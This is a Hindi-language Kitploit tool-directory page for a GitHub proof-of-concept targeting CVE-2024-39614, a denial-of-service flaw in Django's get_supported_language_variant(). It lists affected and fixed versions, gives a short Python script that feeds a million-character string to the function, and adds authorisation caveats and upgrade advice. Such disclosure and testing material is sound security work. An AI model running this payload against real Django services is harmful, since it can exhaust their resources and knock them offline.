Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
-CVE-2024-39614 — CVE-2024-39614 के लिए प्रमाण-अवधारणा, एक Django डेनियल-ऑफ-सर्विस भेद्यता। get_supported_language_variant() में लंबे स्ट्रिंग के माध्यम से संसाधन थकावट प्रदर्शित करता है, जो Django 5.0.7 और 4.2.14 से पहले के संस्करणों को प्रभावित करता है। | Kitploit
उपकरण/GitHubGitHub/abdurahmon3236/-cve-2024-39614
भेद्यता विश्लेषणशोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubabdurahmon3236/-cve-2024-39614

-CVE-2024-39614

CVE-2024-39614 के लिए प्रमाण-अवधारणा, एक Django डेनियल-ऑफ-सर्विस भेद्यता। get_supported_language_variant() में लंबे स्ट्रिंग के माध्यम से संसाधन थकावट प्रदर्शित करता है, जो Django 5.0.7 और 4.2.14 से पहले के संस्करणों को प्रभावित करता है।

रिपॉजिटरी देखें
112 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Django में Denial-of-Service भेद्यता के लिए प्रूफ ऑफ कॉन्सेप्ट (PoC)

इस रिपॉजिटरी में Django के संस्करण 5.0 (5.0.7 से पहले) और 4.2 (4.2.14 से पहले) में Denial-of-Service (DoS) भेद्यता को प्रदर्शित करने वाली एक प्रूफ ऑफ कॉन्सेप्ट (PoC) स्क्रिप्ट शामिल है। यह भेद्यता get_supported_language_variant() फ़ंक्शन में निहित है, जो विशिष्ट वर्णों वाले बहुत लंबे स्ट्रिंग्स को संभालने पर संभावित DoS हमले के प्रति संवेदनशील है।

विषय-सूची

  • भेद्यता विवरण
  • सेटअप और उपयोग
    • PoC स्क्रिप्ट
  • महत्वपूर्ण विचारणीय बातें
  • शमन (Mitigation)

भेद्यता विवरण

CVE-ID: (लंबित)

सारांश: Django के संस्करण 5.0 (5.0.7 से पहले) और 4.2 (4.2.14 से पहले) में get_supported_language_variant() फ़ंक्शन एक Denial-of-Service हमले के प्रति संवेदनशील है। इस फ़ंक्शन का शोषण विशिष्ट वर्णों वाले बहुत लंबे स्ट्रिंग भेजकर किया जा सकता है, जिससे संसाधनों की कमी (resource exhaustion) और परिणामस्वरूप Denial-of-Service की स्थिति उत्पन्न हो सकती है।

प्रभावित संस्करण:

  • Django 5.0 (5.0.7 से पहले)
  • Django 4.2 (4.2.14 से पहले)

सुधारित संस्करण:

  • Django 5.0.7
  • Django 4.2.14

सेटअप और उपयोग

पूर्वापेक्षाएँ

  • Python 3.x
  • Django स्थापित (pip install django)

PoC स्क्रिप्ट

यह स्क्रिप्ट प्रदर्शित करती है कि कैसे एक हमलावर get_supported_language_variant() फ़ंक्शन को एक बहुत लंबा स्ट्रिंग भेजकर भेद्यता का शोषण कर सकता है।

निम्नलिखित स्क्रिप्ट को dos_poc.py के रूप में सहेजें और चलाएँ।

root@kitploit:~
import django
from django.utils.translation import get_supported_language_variant

# Check Django version
if django.VERSION < (4, 2, 14) or (5, 0) <= django.VERSION < (5, 0, 7):
    print("[-] This Django version is vulnerable to the DoS attack.")
else:
    print("[+] This Django version is not vulnerable. Please use a vulnerable version for testing.")

# Generate a very long string containing specific characters
very_long_string = 'a' * 1000000 + '!'  # Adjust the length and content as necessary

def test_dos_vulnerability():
    try:
        # Trigger the vulnerability
        get_supported_language_variant(very_long_string)
        print("[+] Successfully called get_supported_language_variant with a very long string.")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    test_dos_vulnerability()

स्पष्टीकरण

  1. Django संस्करण जाँचें: स्क्रिप्ट पहले जाँचती है कि स्थापित Django संस्करण DoS हमले के प्रति संवेदनशील है या नहीं।
  2. एक बहुत लंबा स्ट्रिंग उत्पन्न करें: विशिष्ट वर्णों वाला एक बहुत लंबा स्ट्रिंग उत्पन्न किया जाता है। भेद्यता को ट्रिगर करने के लिए आवश्यकतानुसार लंबाई और सामग्री समायोजित करें।
  3. परीक्षण फ़ंक्शन: test_dos_vulnerability() फ़ंक्शन भेद्यता का परीक्षण करने के लिए बहुत लंबे स्ट्रिंग के साथ get_supported_language_variant() को कॉल करता है।
  4. स्क्रिप्ट चलाएँ: जब चलाया जाता है, तो स्क्रिप्ट भेद्यता का शोषण करने का प्रयास करेगी और परिणाम प्रिंट करेगी।

महत्वपूर्ण विचारणीय बातें

  • अनुमतियाँ: सुनिश्चित करें कि आपके पास लक्ष्य प्रणाली पर इस भेद्यता का परीक्षण करने की स्पष्ट अनुमति है। अनधिकृत परीक्षण अवैध और अनैतिक है।
  • परीक्षण वातावरण: उत्पादन प्रणालियों को प्रभावित करने से बचने के लिए इस परीक्षण को नियंत्रित वातावरण में करें।
  • संसाधन खपत: यह PoC महत्वपूर्ण सिस्टम संसाधनों का उपभोग कर सकता है। अपने सिस्टम की निगरानी करें और आवश्यक होने पर स्क्रिप्ट को रोकने के लिए तैयार रहें।

शमन (Mitigation)

इस भेद्यता को शमन करने के लिए, Django के सुधारित संस्करणों में अपग्रेड करें:

  • Django 5.0.7
  • Django 4.2.14

अपने Django इंस्टॉलेशन को नवीनतम सुरक्षित संस्करण में अपडेट करने के लिए आधिकारिक Django अपग्रेड निर्देश का पालन करें।

अपने सॉफ़्टवेयर को अद्यतित रखकर और सुरक्षा सर्वोत्तम प्रथाओं का पालन करके, आप Django में इस DoS समस्या जैसी भेद्यताओं को रोक सकते हैं।

टूल डाउनलोड करें